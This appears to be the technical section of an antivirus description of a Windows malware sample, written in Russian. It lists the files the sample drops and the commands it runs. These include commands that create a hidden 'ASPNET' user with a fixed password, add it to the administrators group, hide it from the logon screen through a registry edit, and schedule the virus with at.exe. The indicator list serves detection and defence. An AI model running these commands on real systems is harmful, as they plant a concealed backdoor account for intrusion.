Техническая информация
- %WINDIR%\Tasks\At1.job
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s /add ASPNET
- '<SYSTEM32>\attrib.exe' +h %WINDIR%\TEMP\ztmp
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ASPNET /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
- '<SYSTEM32>\find.exe' "="
- '<SYSTEM32>\at.exe' 10:59 "<Полный путь к вирусу>" ~
- '<SYSTEM32>\attrib.exe' +h %TEMP%\ztmp
- '<SYSTEM32>\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-544'" Get Name /Value
- '<SYSTEM32>\net1.exe' user ASPNET 1Adgjm /add
- %TEMP%\tmp4.tmp
- <SYSTEM32>\wbem\AutoRecover\C8463ECBE33BC240263A0B094E46D510.mof
- %WINDIR%\Temp\tmp3.tmp
- %WINDIR%\Temp\tmp6.tmp
- <SYSTEM32>\wbem\AutoRecover\23BDE61F1F4FACE17E9B0C01F2A1FD9B.mof
- %WINDIR%\Temp\tmp5.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\ztmp\tmp2062.exe
- %TEMP%\ztmp\tmp1762.bat
- %WINDIR%\Temp\ztmp\tmp9416.exe
- %WINDIR%\Temp\ztmp\tmp7649.bat
- %TEMP%\tmp2.tmp
- %WINDIR%\Temp\tmp6.tmp
- %WINDIR%\Temp\tmp5.tmp
- %WINDIR%\Tasks\At1.job
- %WINDIR%\Temp\ztmp\tmp9416.exe
- %TEMP%\ztmp\tmp2062.exe
- %TEMP%\tmp2.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\tmp4.tmp
- %WINDIR%\Temp\tmp3.tmp